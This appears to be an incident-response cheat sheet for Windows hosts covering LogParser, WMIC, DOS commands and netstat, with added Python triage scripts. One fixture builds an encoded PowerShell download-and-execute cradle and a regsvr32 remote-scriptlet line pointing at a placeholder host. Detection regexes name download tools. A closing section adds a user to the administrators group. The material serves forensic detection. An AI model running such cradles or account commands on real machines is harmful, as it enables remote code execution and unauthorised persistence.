LogParser
download link:
https://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=24659
Usage
Security Log
Mainly used to check whether administrator logons fall within the normal working period, and whether the time the Trojan ran lines up with an administrator logon. The EXTRACT_TOKEN indexes pick fields out of the 4624 event's data: token 5 is TargetUserName, 8 is LogonType (2 interactive, 3 network, 10 RDP), 17 is the process that initiated the logon and 18 is the source IP. Switch -o:DATAGRID to -o:CSV when the result is to be fed to a script.

    LogParser -i:EVT -o:DATAGRID "SELECT TimeGenerated AS LoginTime, EXTRACT_TOKEN(Strings,5,'|') AS username, EXTRACT_TOKEN(Strings,8,'|') AS LogonType, EXTRACT_TOKEN(Strings,17,'|') AS ProcessName, EXTRACT_TOKEN(Strings,18,'|') AS SourceIP FROM Security WHERE EventID=4624 AND TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') AND TIMESTAMP('2019-05-31','yyyy-MM-dd')"
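The check described above (administrator logon times against working hours and against the Trojan's run time) as a script over the query's output. This is an added example, not code from the original page or from LogParser. The CSV rows are constructed to match the query's SELECT list as -o:CSV would emit it, and the Trojan first-run time is an assumed value.

```python
"""
Triage of the 4624 logons pulled by the LogParser query above: flag
administrator logons outside working hours or clustered around the time
the Trojan first ran. Added example, not code from the original page or
from LogParser. The CSV rows are constructed (what -o:CSV would emit for
the query's SELECT list); the Trojan run time is an assumed value.
"""
from datetime import datetime, timedelta
import ipaddress

# LogonType values from the 4624 event (well-known Windows constants)
LOGON_TYPES = {
    "2": "Interactive", "3": "Network", "4": "Batch", "5": "Service",
    "7": "Unlock", "8": "NetworkCleartext", "9": "NewCredentials",
    "10": "RemoteInteractive", "11": "CachedInteractive",
}

# Constructed sample output of the query with -o:CSV instead of -o:DATAGRID
SAMPLE_CSV = """\
LoginTime,username,LogonType,ProcessName,SourceIP
2019-05-30 08:55:12,alice,2,C:\\Windows\\System32\\winlogon.exe,-
2019-05-30 09:03:40,SYSTEM,5,C:\\Windows\\System32\\services.exe,-
2019-05-30 12:17:03,WEB01$,3,-,10.0.0.15
2019-05-30 23:41:57,administrator,10,C:\\Windows\\System32\\winlogon.exe,91.203.124.50
2019-05-30 23:46:20,administrator,3,-,91.203.124.50
2019-05-31 10:02:11,bob,10,C:\\Windows\\System32\\winlogon.exe,10.0.0.23
"""


def parse_time(text):
    """LogParser renders TimeGenerated as 'yyyy-MM-dd HH:mm:ss'."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def parse_logons(csv_text):
    """Turn the CSV into dicts keyed by the query's column aliases."""
    lines = [line for line in csv_text.splitlines() if line.strip()]
    header = lines[0].split(",")
    rows = []
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        rec["time"] = parse_time(rec["LoginTime"])
        rows.append(rec)
    return rows


def is_external(ip):
    """True for a routable source address; '-' and private ranges are False."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def flag_logons(logons, malware_time, work_hours=(8, 19), window=timedelta(minutes=30)):
    """
    Return (username, time, reasons) for logons worth a closer look.
    Service logons (type 5) and machine accounts (name ending in $) are
    dropped as noise; a logon is reported if it is outside work_hours,
    is a network/RDP logon from a non-private address, or falls within
    `window` of malware_time.
    """
    findings = []
    for rec in logons:
        if rec["LogonType"] == "5" or rec["username"].endswith("$"):
            continue
        reasons = []
        if not (work_hours[0] <= rec["time"].hour < work_hours[1]):
            reasons.append("outside work hours")
        if rec["LogonType"] in ("3", "10") and is_external(rec["SourceIP"]):
            reasons.append(f"{LOGON_TYPES[rec['LogonType']]} logon from external {rec['SourceIP']}")
        if abs(rec["time"] - malware_time) <= window:
            reasons.append(f"within {window.seconds // 60} min of malware run")
        if reasons:
            findings.append((rec["username"], rec["time"], reasons))
    return findings


if __name__ == "__main__":
    first_run = parse_time("2019-05-30 23:44:00")  # assumed Trojan first-run time
    for user, when, why in flag_logons(parse_logons(SAMPLE_CSV), first_run):
        print(f"{when}  {user:<14}  {'; '.join(why)}")
```

With the sample data only the two administrator logons are reported: both are outside working hours, both come from a non-private address, and both fall within half an hour of the assumed first run. The machine account and the service logon are dropped before any rule runs, which is what keeps the output readable on a busy domain member.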
System Log
Mainly used to view the service name and service path. Strings tokens 0 and 1 only mean "service name" and "image path" for service-installation events (EventID 7045 from Service Control Manager); for other System events they hold unrelated fields, so add AND EventID=7045 to the WHERE clause when hunting for newly installed services.

    LogParser -i:EVT -o:DATAGRID "SELECT TimeWritten, EventID, EventType, EventTypeName, SourceName, EXTRACT_TOKEN(Strings,0,'|') AS service_name, EXTRACT_TOKEN(Strings,1,'|') AS service_path, Message FROM System WHERE TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') AND TIMESTAMP('2019-05-31','yyyy-MM-dd')"
Application Log
Mainly used to check when programs ran during the window.

    LogParser -i:EVT -o:DATAGRID "SELECT * FROM Application WHERE TO_DATE(TimeGenerated) BETWEEN TIMESTAMP('2019-05-30','yyyy-MM-dd') AND TIMESTAMP('2019-05-31','yyyy-MM-dd')"
WMIC
View process command-line parameters, services, the process list and startup items, then check installed patches and their install dates.

    wmic process get caption,commandline /value > tmp.txt
    wmic service list brief
    wmic process list brief
    wmic startup list brief
    rem Check installed patches and their install dates
    wmic qfe
    wmic qfe get caption,description,hotfixid,installedon

WMIC is deprecated in current Windows releases; the PowerShell equivalent of the first command is Get-CimInstance Win32_Process | Select-Object Name, CommandLine. Note that wmic writes UTF-16 when its output is redirected to a file.
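What to do with the tmp.txt produced by the first WMIC command above: parse the /value records and flag command lines that usually indicate malware or living-off-the-land tooling (encoded PowerShell, hidden windows, download cradles, scriptlets pulled over HTTP, executables in user-writable paths). This is an added example, not code from the original page or from WMIC. The sample output is constructed, and the encoded payload is generated in the block so the decoder can be exercised; the rule list is a starting point, not an exhaustive signature set.

```python
"""
Triage of the `wmic process get caption,commandline /value` output the
page redirects into tmp.txt: parse the key=value records and flag command
lines that usually mean malware or living-off-the-land tooling.
Added example, not from the original page or from WMIC. SAMPLE_WMIC is
constructed; the encoded PowerShell payload is generated below so the
decoder can be shown working. When reading a real tmp.txt, remember that
wmic writes UTF-16 when redirected: open(path, encoding="utf-16").
"""
import base64
import binascii
import re

# Constructed payload of the kind seen behind -EncodedCommand (UTF-16LE, base64)
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")
).decode()

# Constructed sample of the /value output format (blank-line separated records)
SAMPLE_WMIC = f"""

Caption=System
CommandLine=


Caption=svchost.exe
CommandLine=C:\\Windows\\system32\\svchost.exe -k netsvcs -p


Caption=powershell.exe
CommandLine=powershell.exe -nop -w hidden -enc {ENCODED}


Caption=update.exe
CommandLine="C:\\Users\\Public\\update.exe" /silent


Caption=regsvr32.exe
CommandLine=regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll


Caption=explorer.exe
CommandLine=C:\\Windows\\Explorer.EXE
"""

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

RULES = [
    (r"(?i)\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|webclient)\b",
     "download/execute cradle"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\bregsvr32(\.exe)?\b.*\s/i:https?://", "regsvr32 scriptlet from URL"),
    (r"(?i)\bmshta(\.exe)?\b.*https?://", "mshta from URL"),
    (r"(?i)\bcertutil(\.exe)?\b.*-urlcache", "certutil download"),
    (r"(?i)\bbitsadmin(\.exe)?\b.*/transfer", "bitsadmin download"),
    (r'(?i)\\(users\\public|appdata\\local\\temp|programdata|windows\\temp)\\[^\\" ]+\.exe',
     "executable in user-writable path"),
]


def parse_wmic_value(text):
    """Split /value output into one dict per process."""
    procs, rec = [], {}
    for line in text.splitlines():
        line = line.strip()          # wmic pads lines and uses \r\r\n endings
        if not line:
            if rec:
                procs.append(rec)
                rec = {}
            continue
        key, _, value = line.partition("=")
        rec[key] = value
    if rec:
        procs.append(rec)
    return procs


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def suspicious(cmdline):
    """List the reasons a command line looks hostile (empty list if clean)."""
    reasons = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded:
        reasons.append("encoded PowerShell: " + decoded.strip()[:60])
        text += "\n" + decoded        # run the rules over the decoded script too
    for pattern, label in RULES:
        if re.search(pattern, text):
            reasons.append(label)
    return reasons


def triage(wmic_text):
    """Return (caption, reasons) for every process with a suspicious command line."""
    findings = []
    for p in parse_wmic_value(wmic_text):
        reasons = suspicious(p.get("CommandLine", ""))
        if reasons:
            findings.append((p.get("Caption", ""), reasons))
    return findings


if __name__ == "__main__":
    for caption, reasons in triage(SAMPLE_WMIC):
        print(f"{caption:<16} {'; '.join(reasons)}")
```

Decoding the -enc payload before matching is the step most often skipped: the cradle in the sample is invisible in the raw command line and only shows up in the decoded UTF-16LE script.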
DOS commands
dir

    DIR [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/N] [/O[[:]sortorder]] [/P] [/Q] [/R] [/S] [/T[[:]timefield]] [/W] [/X] [/4]

    /A   Displays files with the specified attributes:
         D  Directories           R  Read-only files
         H  Hidden files          A  Files ready for archiving
         S  System files          I  Not content indexed files
         L  Reparse points        -  Prefix meaning "not"
    /S   Displays files in the specified directory and all subdirectories
    /W   Uses wide list format
    /P   Pauses after each screenful of information; press any key for the next screen
    /Q   Displays the file owner
copy and xcopy
copy copies only files, not folders.
xcopy copies folders as well as files.

    xcopy parameters
    /S  Copies directories and subdirectories except empty ones
    /E  Copies directories and subdirectories, including empty ones
    /C  Continues copying even if errors occur
    /H  Copies hidden and system files too
del, deltree, rd
del deletes one or more files only; it cannot delete folders.
deltree is an external command that deletes files and folders, including their subfolders (it ships with MS-DOS and Windows 9x, not with NT-based Windows, where rd /s /q does the same job).
rd deletes an empty folder; give it the path of the empty folder.

    del parameters
    /s  Deletes the specified files from all subdirectories
    /q  Quiet mode, does not ask for confirmation
move
Moves one or more files.

    /Y   If a file of the same name exists in the destination, overwrite it without prompting
    /-Y  Prompt before overwriting an existing file
attrib
Changes file attributes.

    attrib [+attr | -attr] [[drive:][path]filename]
    +  Sets an attribute
    -  Clears an attribute
    R  Read-only file
    A  Archive file
    S  System file
    H  Hidden file
netstat
Views network connections and port information.

    NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-t] [-x] [-y] [interval]

    -a        Displays all connections and listening ports
    -b        Displays the executable involved in creating each connection or listening port; requires elevation
    -e        Displays Ethernet statistics
    -n        Displays addresses and port numbers in numerical form
    -o        Displays the owning process ID associated with each connection
    -p proto  Shows connections for the protocol specified; may be TCP, UDP, TCPv6 or UDPv6
    -r        Displays the routing table
    -s        Displays per-protocol statistics
    -t        Displays the current connection offload state
    -x        Displays NetworkDirect connections, listeners and shared endpoints
    -y        Displays the TCP connection template for all connections; cannot be combined with other options
    interval  Redisplays selected statistics, pausing interval seconds between each display; press CTRL+C to stop

When -b is not available (no elevation), netstat -ano plus tasklist gives the same PID-to-image mapping.
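The PID-to-image join just mentioned, as a script: it reads netstat -ano and tasklist /fo csv /nh output, names the process behind every socket, and reports listeners that are not on a per-host baseline as well as established connections to non-private addresses. This is an added example, not code from the original page or from netstat. Both sample outputs and the KNOWN_LISTENERS baseline are constructed for a single hypothetical host.

```python
"""
Join `netstat -ano` with `tasklist /fo csv /nh` to name the process behind
each socket without the elevation that `netstat -b` needs, then flag
listeners that are not on the expected-port baseline and established
connections to non-private addresses. Added example, not from the
original page or from netstat itself. Both sample outputs and the
KNOWN_LISTENERS baseline are constructed for a single host.
"""
import csv
import io
import ipaddress

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1120
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       5204
  TCP    10.0.0.10:49712        91.203.124.50:443      ESTABLISHED     5204
  TCP    10.0.0.10:52011        10.0.0.5:445           ESTABLISHED     4
  UDP    0.0.0.0:123            *:*                                    1504
"""

# tasklist /fo csv /nh columns: Image Name, PID, Session Name, Session#, Mem Usage
SAMPLE_TASKLIST = """\
"System","4","Services","0","148 K"
"svchost.exe","908","Services","0","10,240 K"
"svchost.exe","1120","Services","0","22,016 K"
"svchost.exe","1504","Services","0","8,112 K"
"update.exe","5204","Console","1","31,584 K"
"""

# Baseline of ports this host is expected to expose and the image that owns them
KNOWN_LISTENERS = {135: "svchost.exe", 445: "System", 3389: "svchost.exe", 123: "svchost.exe"}


def parse_netstat_ano(text):
    """One dict per socket line; UDP rows carry no State column."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue          # header, blank and 'Active Connections' lines
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:
            proto, local, foreign, pid = parts[:4]
            state = ""
        conns.append({"proto": proto, "local": local, "foreign": foreign,
                      "state": state, "pid": int(pid)})
    return conns


def parse_tasklist_csv(text):
    """Map PID -> image name; the csv module handles the quoted '10,240 K' column."""
    return {int(row[1]): row[0] for row in csv.reader(io.StringIO(text)) if len(row) >= 2}


def port_of(endpoint):
    """'0.0.0.0:135' or '[::]:135' -> 135."""
    return int(endpoint.rsplit(":", 1)[1])


def is_external(ip):
    """True for a routable address; private, loopback and link-local are False."""
    try:
        addr = ipaddress.ip_address(ip.strip("[]"))
    except ValueError:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def review(netstat_text, tasklist_text):
    """Return (pid, image, reason) for sockets that deviate from the baseline."""
    images = parse_tasklist_csv(tasklist_text)
    findings = []
    for c in parse_netstat_ano(netstat_text):
        image = images.get(c["pid"], "<unknown>")
        if c["state"] == "LISTENING" or c["proto"] == "UDP":
            port = port_of(c["local"])
            expected = KNOWN_LISTENERS.get(port)
            if expected is None:
                findings.append((c["pid"], image, f"unexpected listener {c['proto']}/{port}"))
            elif expected != image:
                findings.append((c["pid"], image, f"{c['proto']}/{port} owned by {image}, expected {expected}"))
        elif c["state"] == "ESTABLISHED":
            remote_ip = c["foreign"].rsplit(":", 1)[0]
            if is_external(remote_ip):
                findings.append((c["pid"], image, f"outbound to {c['foreign']}"))
    return findings


if __name__ == "__main__":
    for pid, image, reason in review(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print(f"PID {pid:<6} {image:<14} {reason}")
```

The baseline check catches the second, quieter case as well: a well-known port such as 3389 that is suddenly owned by something other than svchost.exe is reported even though the port itself is expected.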
netstat on Linux
A typical incident-response invocation is netstat -antp (all TCP sockets, numeric, with owning PID/program); -p shows the program only for sockets you own unless you run it as root.

    usage: netstat [-vWeenNcCF] [<Af>] -r         netstat {-V|--version|-h|--help}
           netstat [-vWnNcaeol] [<Socket> ...]
           netstat { [-vWeenNac] -i | [-cnNe] -M | -s [-6tuw] }

            -r, --route              display routing table
            -i, --interfaces         display interface table
            -g, --groups             display multicast group memberships
            -s, --statistics         display networking statistics (like SNMP)
            -M, --masquerade         display masqueraded connections

            -v, --verbose            be verbose
            -W, --wide               don't truncate IP addresses
            -n, --numeric            don't resolve names
            --numeric-hosts          don't resolve host names
            --numeric-ports          don't resolve port names
            --numeric-users          don't resolve user names
            -N, --symbolic           resolve hardware names
            -e, --extend             display other/more information
            -p, --programs           display PID/Program name for sockets
            -o, --timers             display timers
            -c, --continuous         continuous listing

            -l, --listening          display listening server sockets
            -a, --all                display all sockets (default: connected)
            -F, --fib                display Forwarding Information Base (default)
            -C, --cache              display routing cache instead of FIB
            -Z, --context            display SELinux security context for sockets

      <Socket>={-t|--tcp} {-u|--udp} {-U|--udplite} {-S|--sctp} {-w|--raw} {-x|--unix} --ax25 --ipx --netrom
      <AF>=Use '-6|-4' or '-A <af>' or '--<af>'; default: inet
      List of possible address families (which support routing):
        inet (DARPA Internet) inet6 (IPv6) ax25 (AMPR AX.25)
        netrom (AMPR NET/ROM) ipx (Novell IPX) ddp (Appletalk DDP)
        x25 (CCITT X.25)
User operations

    net user chessur password /add
    net localgroup administrators chessur /add
    net user chessur /active:yes
    net user chessur /active:no
    net user chessur /del